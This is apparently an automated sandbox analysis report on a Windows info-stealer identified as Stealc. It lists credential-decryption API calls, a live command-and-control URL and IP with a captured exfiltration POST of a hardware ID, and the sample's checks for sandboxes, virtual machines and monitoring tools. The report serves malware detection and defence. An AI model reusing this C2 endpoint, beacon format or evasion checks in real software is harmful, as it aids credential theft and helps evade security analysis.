Source: 0.2.file.exe.680000.0.unpack	String decryptor: hwid
Source: 0.2.file.exe.680000.0.unpack	String decryptor: build
Source: 0.2.file.exe.680000.0.unpack	String decryptor: token
Source: 0.2.file.exe.680000.0.unpack	String decryptor: file_name
Source: 0.2.file.exe.680000.0.unpack	String decryptor: file
Source: 0.2.file.exe.680000.0.unpack	String decryptor: message
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.680000.0.unpack	String decryptor: screenshot.jpg

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00699030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00699030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_0068A210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006872A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_006872A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068A2B0 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_0068A2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_0068C920

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_006940F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0068E530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00681710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00681710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_006947C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0068F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00694B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00694B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00693B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00693B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0068DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0068BE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0068EE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0068DF10

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.206/6c4adf523b719729.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 30 43 38 32 34 46 37 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="hwid"9D0C824F71144293944220------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build"tale------KEHDHIDAEHCFHJJJJECA--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.206 185.215.113.206

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

0_2_006862D0

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: unknown

Source: file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpN
Source: file.exe, 00000000.00000002.2132664415.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpfh
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpz
Source: file.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006C0098	0_2_006C0098
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006B2138	0_2_006B2138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006DB198	0_2_006DB198
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4E14B	0_2_00B4E14B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE258	0_2_006EE258
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0099720E	0_2_0099720E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006C4288	0_2_006C4288
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009EF3C0	0_2_009EF3C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AD73CB	0_2_00AD73CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0070B308	0_2_0070B308
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ADC305	0_2_00ADC305
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006FD39E	0_2_006FD39E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009C9489	0_2_009C9489
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006A4573	0_2_006A4573
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006AE544	0_2_006AE544
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006C45A8	0_2_006C45A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006ED5A8	0_2_006ED5A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006FA648	0_2_006FA648
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007096FD	0_2_007096FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006C66C8	0_2_006C66C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA6645	0_2_00AA6645
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006DD720	0_2_006DD720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F6799	0_2_006F6799
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006D4868	0_2_006D4868
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009E88CB	0_2_009E88CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EF8D6	0_2_006EF8D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A3281C	0_2_00A3281C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006DB8A8	0_2_006DB8A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ADA86A	0_2_00ADA86A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006D98B8	0_2_006D98B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A979D6	0_2_00A979D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AE1A03	0_2_00AE1A03
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A94BD3	0_2_00A94BD3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E8BD9	0_2_006E8BD9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F4BA8	0_2_006F4BA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F0B88	0_2_006F0B88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006FAC28	0_2_006FAC28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA7C2A	0_2_00BA7C2A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009C1C09	0_2_009C1C09
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006DBD68	0_2_006DBD68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006B1D78	0_2_006B1D78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AD8D99	0_2_00AD8D99
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EAD38	0_2_006EAD38
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006D4DC8	0_2_006D4DC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9FD7B	0_2_00B9FD7B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006D5DB9	0_2_006D5DB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006C8E78	0_2_006C8E78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ADDE9C	0_2_00ADDE9C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F1EE8	0_2_006F1EE8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AEBFDB	0_2_00AEBFDB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6AF6E	0_2_00B6AF6E

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00684610 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: fozyxqhw ZLIB complexity 0.9946884020814342

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00699790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00699790

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00693970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00693970

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\3TZGWVHC.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 2123776 > 1048576

Source: file.exe

Static PE information: Raw size of fozyxqhw is bigger than: 0x100000 < 0x19b600

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.680000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00699BB0

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x215498 should be: 0x20f1cd

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: fozyxqhw
Source: file.exe	Static PE information: section name: gnsdcfju
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC20AC push eax; mov dword ptr [esp], ebp	0_2_00BC2165
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AED0FE push 4AA7AFC2h; mov dword ptr [esp], edi	0_2_00AED150
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AED0FE push 27CE0C78h; mov dword ptr [esp], ecx	0_2_00AED17E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC10CB push 6604EB85h; mov dword ptr [esp], eax	0_2_00AC10F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC10CB push 2A19899Eh; mov dword ptr [esp], ebx	0_2_00AC112A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC10CB push 657E7F5Eh; mov dword ptr [esp], eax	0_2_00AC1138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC10CB push edi; mov dword ptr [esp], esi	0_2_00AC1163
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC10CB push 463A6754h; mov dword ptr [esp], edx	0_2_00AC11CA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC10CB push edx; mov dword ptr [esp], 3C1F67F5h	0_2_00AC11D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA2042 push edx; mov dword ptr [esp], eax	0_2_00DA20BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA2042 push edx; mov dword ptr [esp], 00001000h	0_2_00DA20CE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA2042 push ecx; mov dword ptr [esp], ebx	0_2_00DA20DF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA2042 push ebx; mov dword ptr [esp], 77F30161h	0_2_00DA20F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA2042 push edi; mov dword ptr [esp], 5FBD8444h	0_2_00DA211F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF4022 push 7E246A93h; mov dword ptr [esp], ebp	0_2_00BF3F57
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BAC005 push edi; mov dword ptr [esp], edx	0_2_00BAC6FF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF3072 push 2679ED87h; mov dword ptr [esp], edx	0_2_00BF30A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5D068 push 633BB1C2h; mov dword ptr [esp], ecx	0_2_00B5D10C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5D068 push ebp; mov dword ptr [esp], edi	0_2_00B5D125
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA7192 push eax; mov dword ptr [esp], esi	0_2_00BA71FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B031F1 push eax; mov dword ptr [esp], ecx	0_2_00B0322C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B031F1 push 1E9AC6AAh; mov dword ptr [esp], edx	0_2_00B03279
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA21B7 push edi; mov dword ptr [esp], esp	0_2_00DA21C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA21B7 push ebx; mov dword ptr [esp], 7F9BAFF6h	0_2_00DA21D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA21B7 push eax; mov dword ptr [esp], ecx	0_2_00DA221B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA21B7 push ecx; mov dword ptr [esp], 6F55E5AAh	0_2_00DA2225
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A0613E push edi; mov dword ptr [esp], 199F7ED6h	0_2_00A061A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A0613E push 7533DAF5h; mov dword ptr [esp], ecx	0_2_00A061BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5D17C push ebp; mov dword ptr [esp], esi	0_2_00A5D2C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5D17C push eax; mov dword ptr [esp], edx	0_2_00A5D2D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4E14B push 2D004818h; mov dword ptr [esp], ebx	0_2_00B4E171

Source: file.exe

Static PE information: section name: fozyxqhw entropy: 7.952608283646461

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00699BB0

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7CB8 second address: AE7CCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7CCD second address: AE7CF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8838h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007F0AD95F8826h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6DAE second address: AE6DB8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD8C6A9C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6DB8 second address: AE6DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6DBE second address: AE6DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0AD8C6A9C8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6DDF second address: AE6DE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6DE3 second address: AE6DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F0AD8C6A9C2h 0x0000000e ja 00007F0AD8C6A9B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE70EE second address: AE70F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE70F2 second address: AE7102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F0AD8C6A9BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7102 second address: AE7128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F0AD95F884Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0AD95F8839h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7569 second address: AE7575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F0AD8C6A9B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7575 second address: AE757A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9CCD second address: AE9CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9CD3 second address: 96DB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 30D845EBh 0x0000000d mov edx, dword ptr [ebp+122D2A29h] 0x00000013 push dword ptr [ebp+122D1595h] 0x00000019 mov si, cx 0x0000001c call dword ptr [ebp+122D3589h] 0x00000022 pushad 0x00000023 jng 00007F0AD95F882Ch 0x00000029 xor eax, eax 0x0000002b jmp 00007F0AD95F882Eh 0x00000030 add dword ptr [ebp+122D34B1h], ebx 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a or dword ptr [ebp+122D34B1h], ebx 0x00000040 add dword ptr [ebp+122D34B1h], edi 0x00000046 mov dword ptr [ebp+122D29C9h], eax 0x0000004c mov dword ptr [ebp+122D34B1h], edi 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D2E75h], edx 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 jg 00007F0AD95F8827h 0x00000067 lodsw 0x00000069 jmp 00007F0AD95F8832h 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jmp 00007F0AD95F882Eh 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b mov dword ptr [ebp+122D34B1h], edi 0x00000081 push eax 0x00000082 pushad 0x00000083 push esi 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
